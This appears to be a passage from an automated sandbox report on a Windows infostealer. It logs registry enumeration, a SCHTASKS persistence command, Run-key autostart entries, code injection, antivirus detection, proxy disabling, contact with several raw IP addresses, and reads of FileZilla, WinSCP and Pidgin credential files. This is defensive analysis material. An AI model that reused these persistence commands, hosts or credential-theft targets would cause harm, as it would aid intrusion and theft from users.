RegOpenKeyExW Dec. 7, 2022, 3:45 p.m.	regkey_r: IE5BAKEX base_handle: 0x000001f8 key_handle: 0x00000224 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX	1
RegOpenKeyExW Dec. 7, 2022, 3:45 p.m.	regkey_r: IEData base_handle: 0x000001f8 key_handle: 0x00000224 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\IEData	1
RegOpenKeyExW Dec. 7, 2022, 3:45 p.m.	regkey_r: MobileOptionPack base_handle: 0x000001f8 key_handle: 0x00000224 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack	1
RegOpenKeyExW Dec. 7, 2022, 3:45 p.m.	regkey_r: Mozilla Thunderbird 78.4.0 (x86 ko) base_handle: 0x000001f8 key_handle: 0x00000224 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Thunderbird 78.4.0 (x86 ko)	1
RegOpenKeyExW Dec. 7, 2022, 3:45 p.m.	regkey_r: Office15.PROPLUSR base_handle: 0x000001f8 key_handle: 0x00000224 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Office15.PROPLUSR	1
RegOpenKeyExW Dec. 7, 2022, 3:45 p.m.	regkey_r: SchedulingAgent base_handle: 0x000001f8 key_handle: 0x00000224 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent	1
RegOpenKeyExW Dec. 7, 2022, 3:45 p.m.	regkey_r: WIC base_handle: 0x000001f8 key_handle: 0x00000224 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\WIC	1
RegOpenKeyExW Dec. 7, 2022, 3:45 p.m.	regkey_r: {00203668-8170-44A0-BE44-B632FA4D780F} base_handle: 0x000001f8 key_handle: 0x00000224 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}	1
RegOpenKeyExW Dec. 7, 2022, 3:45 p.m.	regkey_r: {01B845D4-B73E-4CF7-A377-94BC7BB4F77B} base_handle: 0x000001f8 key_handle: 0x00000224 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}	1
RegOpenKeyExW Dec. 7, 2022, 3:45 p.m.	regkey_r: {1D91F7DA-F517-4727-9E62-B7EA978BE980} base_handle: 0x000001f8 key_handle: 0x00000224 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}	1
RegOpenKeyExW Dec. 7, 2022, 3:45 p.m.	regkey_r: {26A24AE4-039D-4CA4-87B4-2F32180131F0} base_handle: 0x000001f8 key_handle: 0x00000224 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F32180131F0}	1
RegOpenKeyExW Dec. 7, 2022, 3:45 p.m.	regkey_r: {4A03706F-666A-4037-7777-5F2748764D10} base_handle: 0x000001f8 key_handle: 0x00000224 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{4A03706F-666A-4037-7777-5F2748764D10}	1
RegOpenKeyExW Dec. 7, 2022, 3:45 p.m.	regkey_r: {60EC980A-BDA2-4CB6-A427-B07A5498B4CA} base_handle: 0x000001f8 key_handle: 0x00000224 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}	1
RegOpenKeyExW Dec. 7, 2022, 3:45 p.m.	regkey_r: {90150000-0015-0409-0000-0000000FF1CE} base_handle: 0x000001f8 key_handle: 0x00000224 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0015-0409-0000-0000000FF1CE}	1
RegOpenKeyExW Dec. 7, 2022, 3:45 p.m.	regkey_r: {90150000-0016-0409-0000-0000000FF1CE} base_handle: 0x000001f8 key_handle: 0x00000224 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0016-0409-0000-0000000FF1CE}	1
RegOpenKeyExW Dec. 7, 2022, 3:45 p.m.	regkey_r: {90150000-0018-0409-0000-0000000FF1CE} base_handle: 0x000001f8 key_handle: 0x00000224 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0018-0409-0000-0000000FF1CE}	1
RegOpenKeyExW Dec. 7, 2022, 3:45 p.m.	regkey_r: {90150000-0019-0409-0000-0000000FF1CE} base_handle: 0x000001f8 key_handle: 0x00000224 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0019-0409-0000-0000000FF1CE}	1
RegOpenKeyExW Dec. 7, 2022, 3:45 p.m.	regkey_r: {90150000-001A-0409-0000-0000000FF1CE} base_handle: 0x000001f8 key_handle: 0x00000224 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001A-0409-0000-0000000FF1CE}	1
RegOpenKeyExW Dec. 7, 2022, 3:45 p.m.	regkey_r: {90150000-001B-0409-0000-0000000FF1CE} base_handle: 0x000001f8 key_handle: 0x00000224 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001B-0409-0000-0000000FF1CE}	1
RegOpenKeyExW Dec. 7, 2022, 3:45 p.m.	regkey_r: {90150000-001F-0409-0000-0000000FF1CE} base_handle: 0x000001f8 key_handle: 0x00000224 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-0409-0000-0000000FF1CE}	1
RegOpenKeyExW Dec. 7, 2022, 3:45 p.m.	regkey_r: {90150000-001F-040C-0000-0000000FF1CE} base_handle: 0x000001f8 key_handle: 0x00000224 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-040C-0000-0000000FF1CE}	1
RegOpenKeyExW Dec. 7, 2022, 3:45 p.m.	regkey_r: {90150000-001F-0C0A-0000-0000000FF1CE} base_handle: 0x000001f8 key_handle: 0x00000224 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-0C0A-0000-0000000FF1CE}	1
RegOpenKeyExW Dec. 7, 2022, 3:45 p.m.	regkey_r: {90150000-002C-0409-0000-0000000FF1CE} base_handle: 0x000001f8 key_handle: 0x00000224 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-002C-0409-0000-0000000FF1CE}	1
RegOpenKeyExW Dec. 7, 2022, 3:45 p.m.	regkey_r: {90150000-0044-0409-0000-0000000FF1CE} base_handle: 0x000001f8 key_handle: 0x00000224 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0044-0409-0000-0000000FF1CE}	1
RegOpenKeyExW Dec. 7, 2022, 3:45 p.m.	regkey_r: {90150000-006E-0409-0000-0000000FF1CE} base_handle: 0x000001f8 key_handle: 0x00000224 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-006E-0409-0000-0000000FF1CE}	1
RegOpenKeyExW Dec. 7, 2022, 3:45 p.m.	regkey_r: {90150000-0090-0409-0000-0000000FF1CE} base_handle: 0x000001f8 key_handle: 0x00000224 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0090-0409-0000-0000000FF1CE}	1
RegOpenKeyExW Dec. 7, 2022, 3:45 p.m.	regkey_r: {90150000-00A1-0409-0000-0000000FF1CE} base_handle: 0x000001f8 key_handle: 0x00000224 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00A1-0409-0000-0000000FF1CE}	1
RegOpenKeyExW Dec. 7, 2022, 3:45 p.m.	regkey_r: {90150000-00BA-0409-0000-0000000FF1CE} base_handle: 0x000001f8 key_handle: 0x00000224 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00BA-0409-0000-0000000FF1CE}	1
RegOpenKeyExW Dec. 7, 2022, 3:45 p.m.	regkey_r: {90150000-00E1-0409-0000-0000000FF1CE} base_handle: 0x000001f8 key_handle: 0x00000224 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00E1-0409-0000-0000000FF1CE}	1
RegOpenKeyExW Dec. 7, 2022, 3:45 p.m.	regkey_r: {90150000-00E2-0409-0000-0000000FF1CE} base_handle: 0x000001f8 key_handle: 0x00000224 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00E2-0409-0000-0000000FF1CE}	1
RegOpenKeyExW Dec. 7, 2022, 3:45 p.m.	regkey_r: {90150000-0115-0409-0000-0000000FF1CE} base_handle: 0x000001f8 key_handle: 0x00000224 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0115-0409-0000-0000000FF1CE}	1
RegOpenKeyExW Dec. 7, 2022, 3:45 p.m.	regkey_r: {90150000-0117-0409-0000-0000000FF1CE} base_handle: 0x000001f8 key_handle: 0x00000224 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0117-0409-0000-0000000FF1CE}	1
RegOpenKeyExW Dec. 7, 2022, 3:45 p.m.	regkey_r: {90150000-012B-0409-0000-0000000FF1CE} base_handle: 0x000001f8 key_handle: 0x00000224 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-012B-0409-0000-0000000FF1CE}	1
RegOpenKeyExW Dec. 7, 2022, 3:45 p.m.	regkey_r: {91150000-0011-0000-0000-0000000FF1CE} base_handle: 0x000001f8 key_handle: 0x00000224 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{91150000-0011-0000-0000-0000000FF1CE}	1
RegOpenKeyExW Dec. 7, 2022, 3:45 p.m.	regkey_r: {939659F3-71D2-461F-B24D-91D05A4389B4} base_handle: 0x000001f8 key_handle: 0x00000224 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{939659F3-71D2-461F-B24D-91D05A4389B4}	1
RegOpenKeyExW Dec. 7, 2022, 3:45 p.m.	regkey_r: {9B84A461-3B4C-40E2-B44F-CE22E215EE40} base_handle: 0x000001f8 key_handle: 0x00000224 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{9B84A461-3B4C-40E2-B44F-CE22E215EE40}	1
RegOpenKeyExW Dec. 7, 2022, 3:45 p.m.	regkey_r: {AC76BA86-7AD7-FFFF-7B44-AC0F074E4100} base_handle: 0x000001f8 key_handle: 0x00000224 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-FFFF-7B44-AC0F074E4100}	1
RegOpenKeyExW Dec. 7, 2022, 3:45 p.m.	regkey_r: {BB8B979E-E336-47E7-96BC-1031C1B94561} base_handle: 0x000001f8 key_handle: 0x00000224 options: 0 access: 0x00020019 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{BB8B979E-E336-47E7-96BC-1031C1B94561}	1

Uses Windows utilities for basic Windows functionality (2 events)

cmdline	SCHTASKS /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\test22\AppData\Local\Temp\99e342142d\gntuud.exe" /F
cmdline	"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\test22\AppData\Local\Temp\99e342142d\gntuud.exe" /F

One or more of the buffers contains an embedded PE file (1 event)

buffer

Buffer with sha1: a3768139befce92d9338dc2fab9ba7cd000c5ee2

Communicates with host for which no DNS query was performed (4 events)

host	185.106.92.214
host	31.41.244.14
host	31.41.244.188
host	62.204.41.6

Allocates execute permission to another process indicative of possible code injection (1 event)

Time & API	Arguments	Status	Return	Repeated
NtAllocateVirtualMemory Dec. 7, 2022, 3:45 p.m.	process_identifier: 2412 region_size: 221184 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x0000002c	1	0	0

Attempts to identify installed AV products by installation directory (7 events)

file	C:\ProgramData\AVAST Software
file	C:\ProgramData\Avira
file	C:\ProgramData\Kaspersky Lab
file	C:\ProgramData\Panda Security
file	C:\ProgramData\Bitdefender
file	C:\ProgramData\AVG
file	C:\ProgramData\Doctor Web

Installs itself for autorun at Windows startup (7 events)

reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\5jk29l2fg.exe	reg_value	C:\Users\test22\AppData\Local\Temp\1000033001\5jk29l2fg.exe
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\wish.exe	reg_value	C:\Users\test22\AppData\Local\Temp\1000041001\wish.exe
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\linda5.exe	reg_value	C:\Users\test22\AppData\Local\Temp\1000042001\linda5.exe
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\anon.exe	reg_value	C:\Users\test22\AppData\Local\Temp\1000043001\anon.exe
reg_key	HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\pb1109.exe	reg_value	C:\Users\test22\AppData\Local\Temp\1000050001\pb1109.exe
cmdline	SCHTASKS /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\test22\AppData\Local\Temp\99e342142d\gntuud.exe" /F
cmdline	"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN gntuud.exe /TR "C:\Users\test22\AppData\Local\Temp\99e342142d\gntuud.exe" /F

Disables proxy possibly for traffic interception (1 event)

Time & API	Arguments	Status	Return	Repeated
RegSetValueExA Dec. 7, 2022, 3:45 p.m.	key_handle: 0x00000328 regkey_r: ProxyEnable reg_type: 4 (REG_DWORD) value: 0 regkey: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable	1	0	0

Harvests credentials from local FTP client softwares (3 events)

file	C:\Users\test22\AppData\Roaming\FileZilla\sitemanager.xml
file	C:\Users\test22\AppData\Roaming\FileZilla\recentservers.xml
registry	HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions

Harvests information related to installed instant messenger clients (1 event)

file	C:\Users\test22\AppData\Roaming\.purple\accounts.xml

Potential code injection by writing to the memory of another process (1 event)

Time & API	Arguments	Status	Return	Repeated
WriteProcessMemory Dec. 7, 2022, 3:45 p.m.	buffer: @ base_address: 0xfffde008 process_identifier: 2412 process_handle: 0x0000002c	1	1	0

Collects information about installed applications (50 out of 76 events)

Time & API	Arguments	Status
RegQueryValueExW Dec. 7, 2022, 3:45 p.m.	key_handle: 0x00000224 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 7-Zip 20.02 alpha regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip\DisplayName	1
RegQueryValueExW Dec. 7, 2022, 3:45 p.m.	key_handle: 0x00000224 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe AIR regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Adobe AIR\DisplayName	1
RegQueryValueExW Dec. 7, 2022, 3:45 p.m.	key_handle: 0x00000224 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: EditPlus regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\EditPlus\DisplayName	1
RegQueryValueExW Dec. 7, 2022, 3:45 p.m.	key_handle: 0x00000224 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Chrome regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName	1
RegQueryValueExW Dec. 7, 2022, 3:45 p.m.	key_handle: 0x00000224 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 한컴오피스 한글 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Haansoft HWord 80 Korean\DisplayName	1
RegQueryValueExW Dec. 7, 2022, 3:45 p.m.	key_handle: 0x00000224 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Mozilla Thunderbird 78.4.0 (x86 ko) regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Thunderbird 78.4.0 (x86 ko)\DisplayName	1
RegQueryValueExW Dec. 7, 2022, 3:45 p.m.	key_handle: 0x00000224 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Professional Plus 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Office15.PROPLUSR\DisplayName	1
RegQueryValueExW Dec. 7, 2022, 3:45 p.m.	key_handle: 0x00000224 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Adobe AIR regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{00203668-8170-44A0-BE44-B632FA4D780F}\DisplayName	1
RegQueryValueExW Dec. 7, 2022, 3:45 p.m.	key_handle: 0x00000224 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: HttpWatch Professional 9.3.39 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{01B845D4-B73E-4CF7-A377-94BC7BB4F77B}\DisplayName	1
RegQueryValueExW Dec. 7, 2022, 3:45 p.m.	key_handle: 0x00000224 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: 한컴오피스 한글 2010 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{1D91F7DA-F517-4727-9E62-B7EA978BE980}\DisplayName	1
RegQueryValueExW Dec. 7, 2022, 3:45 p.m.	key_handle: 0x00000224 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Java 8 Update 131 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F32180131F0}\DisplayName	1
RegQueryValueExW Dec. 7, 2022, 3:45 p.m.	key_handle: 0x00000224 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Java Auto Updater regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{4A03706F-666A-4037-7777-5F2748764D10}\DisplayName	1
RegQueryValueExW Dec. 7, 2022, 3:45 p.m.	key_handle: 0x00000224 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Google Update Helper regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}\DisplayName	1
RegQueryValueExW Dec. 7, 2022, 3:45 p.m.	key_handle: 0x00000224 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Access MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0015-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Dec. 7, 2022, 3:45 p.m.	key_handle: 0x00000224 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Excel MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0016-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Dec. 7, 2022, 3:45 p.m.	key_handle: 0x00000224 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft PowerPoint MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0018-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Dec. 7, 2022, 3:45 p.m.	key_handle: 0x00000224 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Publisher MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0019-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Dec. 7, 2022, 3:45 p.m.	key_handle: 0x00000224 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Outlook MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001A-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Dec. 7, 2022, 3:45 p.m.	key_handle: 0x00000224 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Word MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001B-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Dec. 7, 2022, 3:45 p.m.	key_handle: 0x00000224 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proofing Tools 2013 - English regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Dec. 7, 2022, 3:45 p.m.	key_handle: 0x00000224 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Outils de vérification linguistique 2013 de Microsoft Office - Français regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-040C-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Dec. 7, 2022, 3:45 p.m.	key_handle: 0x00000224 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proofing Tools 2013 - Español regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-001F-0C0A-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Dec. 7, 2022, 3:45 p.m.	key_handle: 0x00000224 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Proofing (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-002C-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Dec. 7, 2022, 3:45 p.m.	key_handle: 0x00000224 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft InfoPath MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0044-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Dec. 7, 2022, 3:45 p.m.	key_handle: 0x00000224 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Shared MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-006E-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Dec. 7, 2022, 3:45 p.m.	key_handle: 0x00000224 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft DCF MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0090-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Dec. 7, 2022, 3:45 p.m.	key_handle: 0x00000224 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft OneNote MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00A1-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Dec. 7, 2022, 3:45 p.m.	key_handle: 0x00000224 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Groove MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00BA-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Dec. 7, 2022, 3:45 p.m.	key_handle: 0x00000224 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office OSM MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00E1-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Dec. 7, 2022, 3:45 p.m.	key_handle: 0x00000224 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office OSM UX MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-00E2-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Dec. 7, 2022, 3:45 p.m.	key_handle: 0x00000224 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Shared Setup Metadata MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0115-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Dec. 7, 2022, 3:45 p.m.	key_handle: 0x00000224 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Access Setup Metadata MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-0117-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Dec. 7, 2022, 3:45 p.m.	key_handle: 0x00000224 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Lync MUI (English) 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{90150000-012B-0409-0000-0000000FF1CE}\DisplayName	1
RegQueryValueExW Dec. 7, 2022, 3:45 p.m.	key_handle: 0x00000224 regkey_r: DisplayName reg_type: 1 (REG_SZ) value: Microsoft Office Professional Plus 2013 regkey: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{91150000-0011-0000-0000-0000000FF1CE}\DisplayName	1
